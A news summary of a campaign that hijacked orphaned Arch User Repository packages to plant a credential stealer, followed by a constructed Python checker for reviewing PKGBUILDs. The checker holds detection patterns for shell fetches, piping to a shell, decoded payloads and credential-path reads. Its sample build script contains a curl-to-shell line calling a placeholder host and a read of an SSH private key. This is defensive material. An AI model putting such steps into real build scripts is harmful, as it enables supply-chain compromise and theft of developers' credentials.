Arch Linux Packages Hijacked to Steal Developer Secrets Without Hacking
One of the largest open-source package repositories just spent a weekend cleaning up after a malware campaign that did not break into anything. It did not need to. Attackers seized control of more than 1,500 packages in the Arch User Repository, or AUR, the community-run software collection that sits alongside Arch Linux’s official repositories, and […] This story continues at The Next Web
Attackers have compromised over 1,500 packages in the Arch User Repository (AUR), a community-driven software collection for Arch Linux. Instead of traditional hacking, the attackers exploited the AUR's user-submission model by taking control of 'orphaned' packages. They subtly altered build instructions to install a credential stealer on users' machines upon compilation. This method, dubbed 'Atomic Arch' by security firm Sonatype, relied on manipulating trust rather than breaching code security. The compromised packages targeted developers specifically, aiming to steal credentials crucial for further supply-chain attacks. Arch Linux has temporarily frozen new account registrations while it addresses the security breach.
This sophisticated attack highlights a critical vulnerability in open-source software supply chains, demonstrating how trust can be exploited without traditional hacking.
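The attack described above relies on build instructions (the AUR PKGBUILD, a bash script with `prepare()`, `build()` and `package()` functions) doing something at compile time that the package does not need. As an added example, not part of the article and not code from Arch Linux or Sonatype, the Python checker below is the kind of pre-`makepkg` review a user can run over a PKGBUILD: it extracts each shell function and flags out-of-place steps such as network fetches, pipes into a shell, decoded payloads, or reads of credential directories, and it lists source entries fetched over unencrypted transports. The two PKGBUILD samples, the indicator list, and the host `example.invalid` are constructed for illustration; the indicators are heuristics meant to direct a human reviewer, not a verdict.

```python
"""Heuristic review of an AUR PKGBUILD before running makepkg.

Added example (not from the article, Arch Linux or Sonatype). It assumes
the standard PKGBUILD layout: bash functions prepare/build/check/package
and a source=() array. Findings are hints for a human diff review.
"""
import re
from typing import Iterator, List, Tuple

# Constructed indicator list: things a build step of a normal package
# rarely needs. Each entry is (label, compiled regex).
INDICATORS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("network fetch inside a function", re.compile(r"\b(curl|wget)\b")),
    ("pipe to shell", re.compile(r"\|\s*(ba)?sh\b")),
    ("encoded payload", re.compile(r"base64\s+(-d|--decode)")),
    ("eval of dynamic string", re.compile(r"\beval\b")),
    ("credential path", re.compile(r"(\$HOME|~)/\.(ssh|gnupg|aws|config/gh|netrc)")),
    ("persistence hook", re.compile(r"(/etc/(cron|systemd)|\.bashrc|\.profile)")),
]

FUNC_RE = re.compile(r"^\s*(prepare|build|check|package(?:_[\w-]+)?)\s*\(\)\s*\{?\s*$")
SOURCE_RE = re.compile(r"source(?:_\w+)?=\((.*?)\)", re.S)


def function_bodies(pkgbuild: str) -> Iterator[Tuple[str, List[str]]]:
    """Yield (function name, body lines) for each PKGBUILD function.

    Brace depth is tracked by counting '{' and '}' per line, which is
    enough for ordinary PKGBUILDs (${var} expansions are balanced).
    """
    lines = pkgbuild.splitlines()
    i = 0
    while i < len(lines):
        m = FUNC_RE.match(lines[i])
        if not m:
            i += 1
            continue
        name = m.group(1)
        depth = lines[i].count("{") - lines[i].count("}")
        body: List[str] = []
        i += 1
        while i < len(lines):
            depth += lines[i].count("{") - lines[i].count("}")
            if depth <= 0:          # closing brace of the function
                break
            body.append(lines[i])
            i += 1
        yield name, body
        i += 1


def review_pkgbuild(pkgbuild: str) -> List[Tuple[str, int, str, str]]:
    """Return (function, line number within function, indicator, line) findings."""
    findings = []
    for name, body in function_bodies(pkgbuild):
        for n, line in enumerate(body, 1):
            code = line.split("#", 1)[0]    # crude comment strip: enough for a heuristic
            for label, rx in INDICATORS:
                if rx.search(code):
                    findings.append((name, n, label, line.strip()))
    return findings


def insecure_sources(pkgbuild: str) -> List[str]:
    """Return source entries fetched over unencrypted transports."""
    bad = []
    for m in SOURCE_RE.finditer(pkgbuild):
        for entry in m.group(1).split():
            url = entry.strip("'\"").split("::", 1)[-1]   # drop optional name:: prefix
            if url.startswith(("http://", "git://", "ftp://")):
                bad.append(url)
    return bad


# Constructed sample: an ordinary PKGBUILD.
BENIGN = """\
pkgname=hello
pkgver=2.12
pkgrel=1
source=("https://ftp.gnu.org/gnu/hello/hello-$pkgver.tar.gz")
sha256sums=('SKIP')

build() {
  cd "$srcdir/$pkgname-$pkgver"
  ./configure --prefix=/usr
  make
}

package() {
  cd "$srcdir/$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
"""

# Constructed sample: the same package with two added steps a reviewer
# should question (placeholder host, harmless command; for detection only).
SUSPICIOUS = BENIGN.replace("pkgrel=1", "pkgrel=2").replace(
    "  make\n}", "  make\n  # added step with no relation to building hello\n"
                 "  curl -s https://example.invalid/setup | sh\n}").replace(
    "install\n}", "install\n  cat \"$HOME/.ssh/id_ed25519\" > /dev/null\n}")

if __name__ == "__main__":
    for label, text in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(f"== {label}: {len(review_pkgbuild(text))} finding(s)")
        for fn, n, why, line in review_pkgbuild(text):
            print(f"  {fn}() line {n}: {why}: {line}")
        print("  insecure sources:", insecure_sources(text))
```

The useful workflow is to run the checker on the PKGBUILD diff that `makepkg` or an AUR helper shows for an update, so that a changed `pkgrel` accompanied by a new network step in `build()` stands out before anything is compiled.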